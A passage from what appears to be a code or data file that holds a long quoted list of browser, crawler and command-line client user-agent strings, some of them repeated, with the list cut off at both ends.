AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; 
ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! 
Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) 
AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) 
Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! 
Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', 'Links (2.1pre15; FreeBSD 5.4-STABLE i386; 158x58)', 'Wget/1.8.2', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0', 'Mediapartners-Google/2.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031007 Firebird/0.7', 'Mozilla/4.04 [en] (WinNT; I)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20060205 Galeon/2.0.0 (Debian package 2.0.0-2)', 'lwp-trivial/1.41', 'NetBSD-ftp/20031210', 'Dillo/0.8.5-i18n-misc', 'Links (2.1pre20; NetBSD 2.1_STABLE i386; 145x54)', 'Lynx/2.8.5rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d', 'Lynx/2.8.5rel.3 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d', 'Links (2.1pre19; NetBSD 2.1_STABLE sparc64; 145x54)', 'Lynx/2.8.6dev.15 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d', 'Links (2.1pre14; IRIX64 6.5 IP27; 145x54)', 'Wget/1.10.1', 
'ELinks/0.10.5 (textmode; FreeBSD 4.11-STABLE i386; 80x22-2)', 'Links (2.1pre20; FreeBSD 4.11-STABLE i386; 80x22)', 'Lynx/2.8.5rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d-p1', 'Opera/8.52 (X11; Linux i386; U; de)', 'Mozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.8.0.1) Gecko/20060310 Firefox/1.5.0.1', 'Mozilla/5.0 (X11; U; IRIX64 IP27; en-US; rv:1.4) Gecko/20030711', 'Mozilla/4.8 [en] (X11; U; IRIX64 6.5 IP27)', 'Mozilla/4.76 [en] (X11; U; SunOS 5.8 sun4m)', 'Opera/5.0 (SunOS 5.8 sun4m; U) [en]', 'Links (2.1pre15; SunOS 5.8 sun4m; 80x24)', 'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d', 'Wget/1.8.1', 'Wget/1.9.1', 'tnftp/20050625', 'Links (1.00pre12; Linux 2.6.14.2.20051115 i686; 80x24) (Debian pkg 0.99+1.00pre12-1)', 'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.0.16', 'Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7) Gecko/20051122', 'Wget/1.7', 'Lynx/2.8.2rel.1 libwww-FM/2.14', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; de) Opera 8.53', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7e', 'Links (2.1pre20; SunOS 5.10 sun4u; 80x22)', 'Lynx/2.8.5rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7i', 'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8) Gecko/20060202 Firefox/1.5', 'Opera/8.51 (X11; Linux i386; U; de)', 'Emacs-W3/4.0pre.46 URL/p4.0pre.46 (i386--freebsd; X11)', 'Links (0.96; OpenBSD 3.0 sparc)', 'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.6c', 'Lynx/2.8.3rel.1 libwww-FM/2.14', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)', 'libwww-perl/5.79', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.53', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.12) Gecko/20050919 Firefox/1.0.7', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar)', 'msnbot/1.0 (+http://search.msn.com/msnbot.htm)', 'Googlebot/2.1 (+http://www.google.com/bot.html)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051008 Firefox/1.0.7', 'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.51', 'Mozilla/5.0 (compatible; Konqueror/3.4; Linux) KHTML/3.4.3 (like Gecko)', 'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7c', 'Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/5.0 (compatible; Yahoo! 
Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/4.8 [en] (Windows NT 5.1; U)', 'Opera/8.51 (Windows NT 5.1; U; en)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Opera/8.51 (Windows NT 5.1; U; en;VWP-online.de)', 'sproose/0.1-alpha (sproose crawler; http://www.sproose.com/bot.html; crawler@sproose.com)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0,gzip(gfe) (via translate.google.com)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'BrowserEmulator/0.9 see http://dejavu.org', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:0.9.4.1) Gecko/20020508', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.2 (KHTML, like Gecko)', 'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.4) Gecko/20030624', 'iCCrawler (http://www.iccenter.net/bot.htm)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322)', 'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.12) Gecko/20051013 Debian/1.7.12-1ubuntu1', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8) Gecko/20051111 Firefox/1.5', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.50', 'Mozilla/3.0 (x86 [de] Windows NT 5.0; Sun)', 'Java/1.4.1_04', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5', 'msnbot/0.9 (+http://search.msn.com/msnbot.htm)', 'NutchCVS/0.8-dev (Nutch running at UW; http://www.nutch.org/docs/en/bot.html; sycrawl@cs.washington.edu)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-14.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.53', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.4) Gecko/20030619 Netscape/7.1 (ax)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)', 'Mozilla/4.0 (compatible; MSIE 5.16; Mac_PowerPC)', 'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)', 'Mozilla/4.0 (compatible; MSIE 5.5; AOL 7.0; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)', 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)', 'Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)', 'Opera/8.53 (Windows NT 5.1; U; en)', 'Opera/8.01 (Windows NT 5.0; U; de)', 'Opera/8.54 (Windows NT 5.1; U; de)', 'Opera/8.53 (Windows NT 5.0; U; en)', 'Opera/8.01 (Windows NT 5.1; U; de)', 'Opera/8.50 (Windows NT 5.1; U; de)', 'Mozilla/4.0 (compatible- MSIE 6.0- Windows NT 